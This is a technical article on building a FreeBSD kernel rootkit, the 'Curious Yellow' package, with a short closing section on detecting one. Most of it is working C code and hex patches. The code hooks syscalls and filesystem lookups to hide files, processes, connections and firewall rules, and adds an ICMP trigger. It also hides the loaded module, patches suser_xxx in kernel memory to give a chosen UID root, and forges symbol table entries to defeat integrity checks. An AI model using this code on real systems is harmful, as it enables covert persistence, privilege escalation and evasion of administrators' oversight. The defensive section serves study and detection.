1. Introduction
1.1 Kernel Modules
1.2 Useful Functions
2. Techniques
2.1 Replacing Function Pointers
2.1.1. System Calls
2.1.2. Other Tables
2.1.3. Single Function Pointers
2.2. Modifying Kernel Lists
2.3. Reading and Writing Kernel Memory
2.3.1. Finding the address of a symbol
2.3.2. Reading data
2.3.3. Modifying kernel code
3. Common Applications
3.1. Hiding & Redirecting Files
3.2. Hiding Processes
3.3. Hiding Network Connections
3.4. Hiding Firewall Rules
3.5. Network Triggers
3.6. Hiding the module
3.7. Other applications
4. Patching the kernel
4.1. Introduction
4.2. Inserting Jumps
4.3. Replacing Kernel Code
7. Defending yourself: The cat and mouse game
7.1. Checking the symbol table
7.2. Building a Trap Module
7.3. Retrieving data directly
7.4. Remarks
All the information you have about your system comes from the kernel. No matter if you want to know the currently running processes, the files on your system or the current network connections, your tools will request this information from the kernel. If one can alter the behaviour of the kernel and the kernel data one can effectively change the perception you have of your system. This article looks at some of the more 'standard' applications of this technique, such as hiding processes and files and will then go into other ways of altering your kernel, such as patching kernel code or altering the symbol table. Almost all these techniques could be used by someone attacking a system as well as by someone from the defensive side.
Unlike other operating systems, BSD has a feature called secure levels. This allows you to put the system in a state where it is no longer possible to load kernel modules for example. Even though there've been several kernel exploits in the past that lowered the secure level of a running machine and it would be possible to load the module if a reboot is forced, many sysadmins still feel confident that no one will employ these techniques and often put these methods off as being too far fetched. Hopefully it will become clear that these methods are not at all obscure and within reach of most people with a good knowledge of C and some time.
This text has been written for educational purposes only. Use with care :) All the example code is available as a single package called Curious Yellow (CY) at the end of this article.
This text assumes you know the basics of how to write a FreeBSD kernel module. If you've never worked with them before you might want to consult the Dynamic Kernel Linker (KLD) Facility Programming Tutorial published in daemonnews or take a look at the examples provided in /usr/share/examples/kld/ on your FreeBSD machine.
These functions allow you to copy contiguous chunks of data from user space to kernel space and vice versa. More detailed information can be found in their manpage (copy(9)) and also in the KLD tutorial mentioned above.
Say you made a system call which also takes a pointer to a character string as an argument. You now want to copy the user supplied data to kernel space:
struct example_call_args { char *buffer; }; int example_call(struct proc *p, struct example_call_args *uap) { int error; char kernel_buffer_copy[BUFSIZE]; /* copy in the user data */ error = copyin(uap->buffer, &kernel_buffer_copy, BUFSIZE); [...] }
Since you're replacing an existing function, it is important that your newly created function will take the same arguments as the original one. :) You can then either do some pre or post processing while still calling the original function or you can write a complete replacement.
There are a lot of hooks in the kernel where you can employ this method. Let's just look at some of the commonly used places.
struct sysent sysent[] = { { 0, (sy_call_t *)nosys }, /* 0 = syscall */ { AS(rexit_args), (sy_call_t *)exit }, /* 1 = exit */ { 0, (sy_call_t *)fork }, /* 2 = fork */ { AS(read_args), (sy_call_t *)read }, /* 3 = read */ { AS(write_args), (sy_call_t *)write }, /* 4 = write */ { AS(open_args), (sy_call_t *)open }, /* 5 = open */ { AS(close_args), (sy_call_t *)close }, /* 6 = close */ [...]If you want to know what struct sysent looks like and what the numbers of the system calls are, check out /sys/sys/sysent.h and /sys/sys/syscall.h respectively.
Say you would want to replace the open syscall. In the MOD_LOAD section of your load module function, you would then do something like:
sysent[SYS_open] = (sy_call_t *)your_new_open;If you would want to restore the original call when the module is unloaded, you can just set it back:
sysent[SYS_open].sy_call = (sy_call_t *)open;A complete example will follow below.
struct ipprotosw intesw[] keeps a list of information about every supported inet protocol. For every protocol it determines for example which function will be called when a packet comes in and when it goes out. /sys/netinet/in_proto.c will provide you with more information. This means that this provides us with another place to hook up our own function. :) If you would want to set your own function when the module is loaded you would do something like:
inetsw[ip_protox[IPPROTO_ICMP]].pr_input = new_icmp_input;Again, a complete example will follow later.
For every filesystem a vnode table is kept that specifies what function is called for which VOP. Say you wanted to replace ufs_lookup:
ufs_vnodeop_p[VOFFSET(vop_lookup)] = (vop_t *) new_ufs_lookup;
There's more places like this where you can hook in, depending on what you want to achieve. The only documentation however is the kernel source itself.
Some of the more interesting lists are:
The process list: struc proclist allproc and zombproc. You probably don't want to alter these lists as they are also used for scheduling purposes unless you want to rewrite larger parts of the kernel. However you can filter these lists when a user requests them.
The linker_files list: this list contains the files linked to the kernel. Every link file can contain one or more modules. This has been described in the THC article, so I won't go into that here. This list will become important when we want to alter the address of a symbol or hide the loaded file with modules.
The module list: modulelist_t modules contains a list of the loaded modules. Note that this is different from the files linked. A file can contain more then one module. This will also become important when you want to hide your module.
Of course there's a lot more to be found in the kernel sources.
[...] char errbuf[_POSIX2_LINE_MAX]; kvm_t *kd; struct nlist nl[] = { { NULL }, { NULL }, }; nl[0].n_name = argv[1]; kd = kvm_openfiles(NULL,NULL,NULL,O_RDONLY,errbuf); if(!kd) { fprintf(stderr,"ERROR: %s\n",errbuf); exit(-1); } if(kvm_nlist(kd,nl) < 0) { fprintf(stderr,"ERROR: %s\n",kvm_geterr(kd)); exit(-1); } if(nl[0].n_value) printf("symbol %s is 0x%x at 0x%x\n",nl[0].n_name,nl[0].n_type,nl[0].n_value); else printf("%s not found\n",nl[0].n_name); if(kvm_close(kd) < 0) { fprintf(stderr,"ERROR: %s\n",kvm_geterr(kd)); exit(-1); } [...]
If you want to retrieve a whole list from the kernel, you can do so by first finding the list head and then using the pointer to the next element to go on. This pointer will provide you with the correct address to read from. Likewise you can also retrieve other data in the struct that has a pointer to it, like the user credentials below. This is an excerpt from listproc.c that illustrates how this works after the address of allprocs, the list head, has been determined:
[...] kvm_read(kd,nl[0].n_value, &allproc, sizeof(struct proclist)); printf("PID\tUID\n\n"); for(p_ptr = allproc.lh_first; p_ptr; p_ptr = p.p_list.le_next) { /* read this proc structure */ kvm_read(kd,(u_int32_t)p_ptr, &p, sizeof(struct proc)); /* read the user credential */ kvm_read(kd,(u_int32_t)p.p_cred, &cred, sizeof(struct pcred)); printf("%d\t%d\n", p.p_pid, cred.p_ruid); }
There's multiple levels you can hook in your code in order to hide your files. One way is via catching system calls such as open, stat, etc. Another way is to hook in at the lookup functions of the underlying filesystem.
/* * open replacement */ int new_open(struct proc *p, register struct open_args *uap) { char name[NAME_MAX]; size_t size; /* get the supplied arguments from userspace */ if(copyinstr(uap->path, name, NAME_MAX, &size) == EFAULT) return(EFAULT); /* if the entry should be hidden and the user is not magic, return not found */ if(file_hidden(name) && !(is_magic_user(p->p_cred->pc_ucred->cr_uid))) return(ENOENT); return(open(p,uap)); }In the function file_hidden you can then check if the filename should be hidden. In the loader of your module you then replace the call to open with new_open in the syscall table:
static int load(struct module *module, int cmd, void *arg) { switch(cmd) { case MOD_LOAD: mod_debug("Replacing open call\n"); sysent[SYS_open]=new_open_sysent; break; case MOD_UNLOAD: mod_debug("Restoring open\n"); sysent[SYS_open].sy_call = (sy_call_t *)open; break; default: error = EINVAL; break; } return(error); }The other calls can be changed the same way. Only for getdirentries, which retrieves a directory listing, you have to do a bit more effort. In this case you can call the original getdirentries and then cut the files you want to hide out of the response. This has been described in the THC article and some other places, so I won't go into detail here.
For every filesystem there is such a VOP table that determines which function to call for which kind of operation. For UFS you can find this in /sys/ufs/ufs/ufs_vnops.c, for Procfs this is located in /sys/miscfs/procfs/procfs_vnops.c. For other filesystems this will be located in similar files. If you want to hide a single file, you have to change the lookup and in some cases also the cached lookup function.
Say you wanted all lookups on a UFS filesystem to go to your own function. First of all you would make a new ufs_lookup. From module/file-ufs.c:
/* * ufs lookup replacement */ int new_ufs_lookup(struct vop_cachedlookup_args *ap) { struct componentname *cnp = ap->a_cnp; if(file_hidden(cnp->cn_nameptr) && !(is_magic_user((cnp->cn_cred)->cr_uid))) { mod_debug("Hiding file %s\n",cnp->cn_nameptr); return(ENOENT); } return(old_ufs_lookup(ap)); }Then you would have to adjust the pointer in the vnode table when the module is loaded:
extern vop_t **ufs_vnodeop_p; vop_t *old_ufs_lookup; static int load(struct module *module, int cmd, void *arg) { switch(cmd) { case MOD_LOAD: mod_debug("Replacing UFS lookup\n"); old_ufs_lookup = ufs_vnodeop_p[VOFFSET(vop_lookup)]; ufs_vnodeop_p[VOFFSET(vop_lookup)] = (vop_t *) new_ufs_lookup; break; case MOD_UNLOAD: mod_debug("Restoring UFS lookup\n"); ufs_vnodeop_p[VOFFSET(vop_lookup)] = old_ufs_lookup; break; default: error = EINVAL; break; } return(error); }This is not much more effort then replacing the syscalls. Similarly you have to adjust ufs_readdir if you would want to hide a file from directory listings. Currently CY does not come with an example for that but you can basically do it like the getdirentries and the procfs_readdir replacements.
#define P_HIDDEN 0x8000000When a process is hidden, we'll set this flag so it can be recognized later. See module/control.c for the CY control functions that hide and unhide a process.
If you do a ps, it will go to kvm_getprocs, which in return will make a sysctl with the following arguments:
name[0] = CTL_KERN name[1] = KERN_PROC name[2] = KERN_PROC_PID, KERN_PROC_ARGS etc name[3] can contain the pid in case information about only one process is requested.name is an array that contains the mib, describing what kind of information is requested: eg what kind of sysctl operation it is and what is requested exactly. In short the following sub query types are possible: (from /sys/sys/sysctl.h)
/* * KERN_PROC subtypes */ #define KERN_PROC_ALL 0 /* everything */ #define KERN_PROC_PID 1 /* by process id */ #define KERN_PROC_PGRP 2 /* by process group id */ #define KERN_PROC_SESSION 3 /* by session of pid */ #define KERN_PROC_TTY 4 /* by controlling tty */ #define KERN_PROC_UID 5 /* by effective uid */ #define KERN_PROC_RUID 6 /* by real uid */ #define KERN_PROC_ARGS 7 /* get/set arguments/proctitle */This will ultimately end up at __sysctl. The THC article also contains some information on this, but since I had implemented it differently, I included some example code in module/process.c. This is also the place where we'll hide network connections later.
The other way process information is obtained via procfs. Tools like top use procfs, but you can also take a quick look yourself. For every process /proc will contain a directory with the specified process id and contain files that contain more information about this process. Remember that all the filesystem information was also just what the kernel gives you, it doesn't matter where this data comes from, so the filesystem way is just one way of representing process information. Hiding files from procfs therefore comes down to what we've used before in the file section. You could of course hide a pid from getdirentries etc, but I think that's a bit overdone and to my experience, especially on servers, files with numeric names actually tend to get created. This would cause things to break and suspicion to arise :)
However, similar to UFS one can also just fix the corresponding entries for procfs. Example code for this is given in module/process.c. A new procfs lookup for example could look like this:
/* * replacement for procfs_lookup, this will be used in the case someone doesn't just * do a ls in /proc but tries to enter a dir with a certain pid */ int new_procfs_lookup(struct vop_lookup_args *ap) { struct componentname *cnp = ap->a_cnp; char *pname = cnp->cn_nameptr; pid_t pid; pid = atopid(pname, cnp->cn_namelen); if(pid_hidden(pid) && !(is_magic_user((cnp->cn_cred)->cr_uid))) return(ENOENT); return(old_procfs_lookup(ap)); }You would then replace it when you load the module:
extern struct vnodeopv_entry_desc procfs_vnodeop_entries[]; extern struct vnodeopv_desc **vnodeopv_descs; vop_t *old_procfs_lookup; static int load(struct module *module, int cmd, void *arg) { switch(cmd) { case MOD_LOAD: mod_debug("Replacing procfs_lookup\n"); old_procfs_lookup = procfs_vnodeop_p[VOFFSET(vop_lookup)]; procfs_vnodeop_p[VOFFSET(vop_lookup)] = (vop_t *)new_procfs_lookup; break; case MOD_UNLOAD: mod_debug("Restoring procfs_lookup\n"); procfs_vnodeop_p[VOFFSET(vop_lookup)] = old_procfs_lookup; break; default: error = EINVAL; break; } return(error); }
name[0] = CTL_NET name[1] = PF_INET name[2] = IPPROTO_TCP name[3] = TCPCTL_PCBLISTIn exactly the same way as before, the data to be hidden will be cut out of the data retrieved by userland_sysctl. CY allows you to specify various connections that should be hidden via cyctl. See module/process.c for the __sysctl modifications.
The CY control function provides an option to hide the specified firewall rule. Similar to processes one can use a flag to indicate hidden rules. When one walks the list of firewall rules, each rule wil be of struct ip_fw. You can find the layout of this struct in /sys/netinet/ip_fw.h. It contains an entry called fw_flg, which records the flags set for this rule. You add a new flag, namely IP_FW_F_HIDDEN.
#define IP_FW_F_HIDDEN 0x80000000
The example code provided in module/fw.c hides firewall rules from list requests: ipfw -l. When you do a ipfw -l this function will be called and the operation will be IP_FW_GET. So we can just deal with this request our own and pass all other requests on to the original function. For each rule we encounter while walking through the lists of rules, we check if the hidden flag is set. If so, it will not be included in the output. Since this is rather long I won't include it here in the text, but you can find the example code including the modification upon loading of the module in CY.
Since FreeBSD ipfw comes with functionality to forward and divert connections you could probably also build backdoors this way. If this is enabled, you can run your own back door on localhost and a certain port, say 12345. You can then first hide this entry from netstat with the help of cyctl using the method described earlier. You can then add a firewall rule that will forward all connections to, say, port 22 coming from a certain host to port 12345, localhost. Then you can hide your firewall rules for this. I still have to try this in practice, but this will be in the updated version I plan to release when I have more time after HAL.
CY contains a small example, which allows you to define a trigger on an icmp echo packet containing a certain payload. First of all you have to create a replacement for icmp_input again. This has been done in module/icmp.c, but will only be included here partially since it is rather long. One thing you can do when you want to alter just a little piece in these functions, is to copy the original function and then just modify the few locations you intent to change. The icmp header itself is described in /usr/include/netinet/ip_icmp.h.
Part of module/icmp.c:
[...] case ICMP_ECHO: if (!icmpbmcastecho && (m->m_flags & (M_MCAST | M_BCAST)) != 0) { icmpstat.icps_bmcastecho++; break; } /* check if the packet contains the specified trigger */ if(!strcmp(icp->icmp_data,ICMP_TRIGGER)) { mod_debug("ICMP trigger\n"); /* decrease receive stats */ icmpstat.icps_inhist[icp->icmp_type]--; trigger_test(icp->icmp_data); /* don't send a reply */ goto freeit; } [...]Then, in order to replace icmp_input when the module is loaded:
extern struct ipprotosw inetsw[]; extern u_char ip_protox[]; void *old_icmp_input; static int load(struct module *module, int cmd, void *arg) { switch(cmd) { case MOD_LOAD: mod_debug("Replacing ICMP Input\n"); old_icmp_input = inetsw[ip_protox[IPPROTO_ICMP]].pr_input; inetsw[ip_protox[IPPROTO_ICMP]].pr_input = new_icmp_input; break; case MOD_UNLOAD: mod_debug("Restoring icmp_input\n"); inetsw[ip_protox[IPPROTO_ICMP]].pr_input = old_icmp_input; break; default: error = EINVAL; break; } return(error); }The CY example will just call a function with the icmp payload passed to it, which is rather useless :) Other things would be possible of course. You could for example also use this to transform packets for the travel to the box and turn them back before inserting them into the normal packet processing engine.
As mentioned earlier the kernel maintains a list of files linked. These files then contain the kernel code. So first of all, one would want to remove the file from this list. This list is called linker_files and can be found in /sys/kern/kern_linker.c. Furthermore it keeps a counter called next file id which is located in next_file_id, so one'd want to decrement that. The same goes for the reference counter of the kernel. So, as the first step, the linked file will be removed from this list:
extern linker_file_list_t linker_files; extern int next_file_id; extern struct lock lock; [...] linker_file_t lf = 0; /* lock exclusive, since we change things */ lockmgr(&lock, LK_EXCLUSIVE, 0, curproc); (&linker_files)->tqh_first->refs--; TAILQ_FOREACH(lf, &linker_files, link) { if (!strcmp(lf->filename, "cyellow.ko")) { /*first let's decrement the global link file counter*/ next_file_id--; /*now let's remove the entry*/ TAILQ_REMOVE(&linker_files, lf, link); break; } } lockmgr(&lock, LK_RELEASE, 0, curproc);The next thing one needs to do, is remove the modules from the module list. In the case of CY this is only one. Similar to the linker_file the module list also keeps a counter, nextid, one should decrement.
extern modulelist_t modules; extern int nextid; [...] module_t mod = 0; TAILQ_FOREACH(mod, &modules, link) { if(!strcmp(mod->name, "cy")) { /*first let's patch the internal ID counter*/ nextid--; TAILQ_REMOVE(&modules, mod, link); } } [...]If you now look at kldstat the module will have disappeared. Note however because it was also deleted from the module list, modfind will no longer be able to locate your module. This is only a problem in case your module contains system calls you later want to use. However it is possible to specify the offset manually, if nothing else is loaded this will be 210. The CY control program cyctl allows you to specify this manually. This makes me assume there must be another way to still locate the module, but I haven't looked into that yet.
It should also be possible to filter reads and writes. This would become particularly interesting in the case of /dev/kmem through which a lot of information can be obtained.
In the techniques section I've already outlined some of the basic ways on how to work with /dev/kmem. This section concentrates on writing to /dev/kmem.
This means you would load a module with your own calls, but not adapt anything when the module is loaded. You can then write a jump to /dev/kmem to redirect the execution of the old function. Alternatively you could also do this when the module is loaded of course.
In the tools section, there's a file called tools/putjump.c:
/* the jump */ unsigned char code[] = "\xb8\x00\x00\x00\x00" /* movl $0,%eax */ "\xff\xe0" /* jmp *%eax */ ; int main(int argc, char **argv) { char errbuf[_POSIX2_LINE_MAX]; long diff; kvm_t *kd; struct nlist nl[] = { { NULL }, { NULL }, { NULL }, }; if(argc < 3) { fprintf(stderr,"Usage: putjump [from function] [to function]\n"); exit(-1); } nl[0].n_name = argv[1]; nl[1].n_name = argv[2]; kd = kvm_openfiles(NULL,NULL,NULL,O_RDWR,errbuf); if(kd == NULL) { fprintf(stderr,"ERROR: %s\n",errbuf); exit(-1); } if(kvm_nlist(kd,nl) < 0) { fprintf(stderr,"ERROR: %s\n",kvm_geterr(kd)); exit(-1); } if(!nl[0].n_value) { fprintf(stderr,"Symbol %s not found.\n",nl[0].n_name); exit(-1); } if(!nl[1].n_value) { fprintf(stderr,"Symbol %s not found.\n",nl[1].n_name); exit(-1); } printf("%s is 0x%x at 0x%x\n",nl[0].n_name,nl[0].n_type,nl[0].n_value); printf("%s is 0x%x at 0x%x\n",nl[1].n_name,nl[1].n_type,nl[1].n_value); /* set the address to jump to */ *(unsigned long *)&code[1] = nl[1].n_value; if(kvm_write(kd,nl[0].n_value,code,sizeof(code)) < 0) { fprintf(stderr,"ERROR: %s\n",kvm_geterr(kd)); exit(-1); } printf("Written the jump\n"); if(kvm_close(kd) < 0) { fprintf(stderr,"ERROR: %s\n",kvm_geterr(kd)); exit(-1); } exit(0); }Data can be written to other places accordingly.
In order to verify that someone is root, or the superuser, most self-respecting kernel functions call suser, which in return calls suser_xxx. This will check if the user is root, and then allow it certain priviledges, such as opening raw sockets etc. Altering this function will provide an example to illustrate modifying existing code. Let's look at the existing code on my 4.3R machine. First of all, find out where this function is located. For this you can use nm /kernel | grep suser_xxx or also tools/findsym suser_xxx. On my laptop this is at 0xc019d538. On your machine it will most likely be somewhere else. So now for the existing kernel code at that address:
# objdump -d /kernel --start-address=0xc019d538 | more /kernel: file format elf32-i386 Disassembly of section .text: c019d538This is what suser_xxx has been compiled to. You can compare this with the original code for suser_xxx, which is defined in /sys/kern/kern_prot.c:: c019d538: 55 push %ebp c019d539: 89 e5 mov %esp,%ebp c019d53b: 8b 45 08 mov 0x8(%ebp),%eax c019d53e: 8b 55 0c mov 0xc(%ebp),%edx c019d541: 85 c0 test %eax,%eax c019d543: 75 20 jne c019d565 c019d545: 85 d2 test %edx,%edx c019d547: 75 13 jne c019d55c c019d549: 68 90 df 36 c0 push $0xc036df90 c019d54e: e8 5d db 00 00 call c01ab0b0 c019d553: b8 01 00 00 00 mov $0x1,%eax c019d558: eb 32 jmp c019d58c c019d55a: 89 f6 mov %esi,%esi c019d55c: 85 c0 test %eax,%eax c019d55e: 75 05 jne c019d565 c019d560: 8b 42 10 mov 0x10(%edx),%eax c019d563: 8b 00 mov (%eax),%eax c019d565: 83 78 04 00 cmpl $0x0,0x4(%eax) c019d569: 75 e8 jne c019d553 c019d56b: 85 d2 test %edx,%edx c019d56d: 74 1b je c019d58a c019d56f: 83 ba 60 01 00 00 00 cmpl $0x0,0x160(%edx) c019d576: 74 07 je c019d57f c019d578: 8b 45 10 mov 0x10(%ebp),%eax c019d57b: a8 01 test $0x1,%al c019d57d: 74 d4 je c019d553 c019d57f: 85 d2 test %edx,%edx c019d581: 74 07 je c019d58a c019d583: 80 8a 72 01 00 00 02 orb $0x2,0x172(%edx) c019d58a: 31 c0 xor %eax,%eax c019d58c: c9 leave c019d58d: c3 ret c019d58e: 89 f6 mov %esi,%esi
int suser_xxx(cred, proc, flag) struct ucred *cred; struct proc *proc; int flag; { if (!cred && !proc) { printf("suser_xxx(): THINK!\n"); return (EPERM); } if (!cred) cred = proc->p_ucred; if (cred->cr_uid != 0) return (EPERM); if (proc && proc->p_prison && !(flag & PRISON_ROOT)) return (EPERM); if (proc) proc->p_acflag |= ASU; return (0); }Unless you're the total assembler person (unlike me :) ), you have to look at this for a bit. You can infer that %eax contains the cred and %edx the proc stuff. Basically what we would want now is something like this:
if ((cred->cr_uid != 0) && (cred->cr_uid != MAGIC_UID)) return (EPERM);Now we just have to find some place to add this code. What comes to mind is to use the space that is used up by the printf. It seems this will only be called if someone made an error using suser_xxx in the kernel. Let's just assume no one will miss a THINK! on his/her screen. Looking at the assembler code one can see that the compiler made all the places where a EPERM should be returned jump to c019d553: mov $0x1,%eax. Also the test for uid 0 above is located at:
c019d565: 83 78 04 00 cmpl $0x0,0x4(%eax) c019d569: 75 e8 jne c019d553Lets first change this to jump to go to the place where we'll add our new code. This is where the start of the printf stuff is located:
c019d549: 68 90 df 36 c0 push $0xc036df90 c019d54e: e8 5d db 00 00 call c01ab0b0For this we need to change the address the jump will go to. 0x75 specified jne and 0xe8 above is the jump address.
For this to do anything useful however, we now get rid of the printf and replace it with another check, this time if we're the magic user. For this, first add a jump to jump over this extra test in case the test if (!cred && !proc) right at the beginning will actually lead normal execution to the printf statement. After this the extra test can be added. Basically this means one'd want to put something like
jmp 0x07 eb 07 /* jump over this */ cmpl $magic,0x4(%eax) 83 78 04 magic /* check if magic user */ je 0x39 74 39 /* jump to end if equal */ nop 90 /* nops to fill up the space */ nop 90in place of the printf. This means the jmp after if (cred->cr_uid != 0) at 0xc019d569 would have to be changed to 75 e0. (jump back 8 bytes more). At the end two nops are added since the original printf push/call took more space.
Ok, now let's put this all together. This will add the extra check for user with uid 100 (me on my laptop :) ) as described above:
#includeIn direct/fix_suser_xxx.c you will find a slightly altered version, which will ask you for your user id (< 256 ;)) and find out the location of fix_suser_xxx itself.#include #include #include #include #define MAGIC_ADDR 0xc019d549 #define MAKE_OR_ADDR 0xc019d569 unsigned char magic[] = "\xeb\x07" /* jmp 06 */ "\x83\x78\x04\x00" /* cmpl $magic,0x4(%eax) */ "\x74\x39" /* je to end */ "\x90\x90" /* filling nop */ ; unsigned char makeor[] = "\x75\xe0"; /* jne e0 */ int main(int argc, char **argv) { char errbuf[_POSIX2_LINE_MAX]; long diff; kvm_t *kd; u_int32_t magic_addr = MAGIC_ADDR; u_int32_t makeor_addr = MAKE_OR_ADDR; kd = kvm_openfiles(NULL,NULL,NULL,O_RDWR,errbuf); if(kd == NULL) { fprintf(stderr,"ERROR: %s\n",errbuf); exit(-1); } if(kvm_write(kd,MAGIC_ADDR,magic,sizeof(magic)-1) < 0) { fprintf(stderr,"ERROR: %s\n",kvm_geterr(kd)); exit(-1); } if(kvm_write(kd,MAKE_OR_ADDR,makeor,sizeof(makeor)-1) < 0) { fprintf(stderr,"ERROR: %s\n",kvm_geterr(kd)); exit(-1); } if(kvm_close(kd) < 0) { fprintf(stderr,"ERROR: %s\n",kvm_geterr(kd)); exit(-1); } exit(0); }
After you made these changes you can quickly test it, with your new superuser by copying /sbin/ping to your own directory and executing it as the user.
If you've been changing kernel code directly in memory, you can write your changes directly to /kernel. I did not check this with the elf docs, but it seems that the relocation addresses are equal to the offset in /kernel plus 0xc0100000. You might want to check this on your machine before writing to /kernel. There's an example for this, which also modifies suser_xxx in direct/fix_suser_xxx_kernel.c
This is an excerpt from exp/symtable.c:
int set_symbol(struct proc *p, struct set_symbol_args *uap) { linker_file_t lf; elf_file_t ef; unsigned long symnum; const Elf_Sym* symp = NULL; Elf_Sym new_symp; const char *strp; unsigned long hash; caddr_t address; int error = 0; mod_debug("Set symbol %s address 0x%x\n",uap->name,uap->address); lf = TAILQ_FIRST(&linker_files); ef = lf->priv; /* First, search hashed global symbols */ hash = elf_hash(uap->name); symnum = ef->buckets[hash % ef->nbuckets]; while (symnum != STN_UNDEF) { if (symnum >= ef->nchains) { printf("link_elf_lookup_symbol: corrupt symbol table\n"); return ENOENT; } symp = ef->symtab + symnum; if (symp->st_name == 0) { printf("link_elf_lookup_symbol: corrupt symbol table\n"); return ENOENT; } strp = ef->strtab + symp->st_name; if (!strcmp(uap->name, strp)) { /* found the symbol with the given name */ if (symp->st_shndx != SHN_UNDEF || (symp->st_value != 0 && ELF_ST_TYPE(symp->st_info) == STT_FUNC)) { /* give some debug info */ address = (caddr_t) ef->address + symp->st_value; mod_debug("found %s at 0x%x!\n",uap->name,(uintptr_t)address); bcopy(symp,&new_symp,sizeof(Elf_Sym)); new_symp.st_value = uap->address; address = (caddr_t) ef->address + new_symp.st_value; mod_debug("new address is 0x%x\n",(uintptr_t)address); /* set the address */ bcopy(&new_symp,(ef->symtab + symnum),sizeof(Elf_Sym)); break; break; } else return(ENOENT); } symnum = ef->chains[symnum]; } /* for now this only looks at the global symbol table */ return(error); }The symtable module is a seperate module which will load the system call above. You can test it using the set_sym utility. This defeats the checks made by tools/checkcall.
This table is also consulted when new stuff is linked into the kernel, so you might want to play with this :) Unfortunately I didn't get around to it yet.
Let's look at some of the methods that could be used to detect such a module.
This approach probably works in many cases. However when other tables are altered it won't detect the modifications. Of course you could go and check more tables in your module in exactly the same way. Furthermore this approach will not detect modifications that have been made by inserting jumps to other functions or completely different code into the running kernel.
You could also check the syscall table via /dev/kmem. There's a small example in tools/checkcall which will take the name of a syscall and it's syscall index and check if this entry in the syscall table really points to this function.
The problem with this approach however is that the symbol table in memory can be altered as shown in the experimental section above. This means that when checkcall find out where a certain function should actually be, it could retrieve the wrong value. Perhaps a small example will clarify this: assume we've loaded standard CY. Let's say we want to check the open syscall. The number of SYS_open from /sys/sys/syscall.h is 5. So let's call tools/checkcall open 5:
# tools/checkcall open 5 Checking syscall 5: open sysent is 0x4 at 0xc03b7308 sysent[5] is at 0xc03b7330 and will go to function at 0xc0cd5bf4 ALERT! It should go to 0xc01ce5f8 insteadHowever, we can fix this using setsym. For this you first need to load the module contained in the experimental section exp/.
# exp/setsym 0xc0cd5bf4 openNow checkcall will no longer complain, as it assumes open is really at 0xc0cd5bf4. Again however this is not the end of the story. We could now check /kernel whats actually there at address 0xc0cd5bf4 using objdump -d /kernel --start-address=0xc0cd5bf4. The suspicion that this address is way to high for a function that was loaded together with the original kernel is confirmed. objdump will find nothing at the address. This is another indication that something fishy is going on.
The problem with this approach is that someone could use file redirection to point you to a different /kernel or objdump. However it would be quite a bit of hassle to cover this up.
Note however that the defensive methods outlined in 7.1. can also be used against your trapmodule :)
If you load your own kernel module you can supply a system call that will give you access to the kernel data and structures you want. Alternatively you can also just provide a second copy of some of the existing stuff that can be replaced, although that's a bit of a hassle.
The problem with this approach is however that an attacker that knows of your modules, can circumvent them.
You can also retrieve the data directly from /dev/kmem. Above I already described how to retrieve data from kernel memory and also how to get access to whole structures. tools/listprocs.c contains an example of how to get a list of the currently running processes. You can retrieve other structures in the same way. It would probably be possible to filter reads from /dev/kmem to obscure this information. However this would require some more effort.
Hopefully this article made it clear that all these kinds of manipulations are not that difficult or rare as some people seem to think. If you're the sysadmin of a box, you should always keep the possibility of these things in your head even if you run your FreeBSD system with a higher secure level (which you always should).
Playing with this kind of stuff allows you to learn more about how the kernel works. And, most importantly, it can be fun :)
Job de Haas for getting me interested in this whole stuff Olaf Erb for checking the article for readability :) and especially Alex Le Heux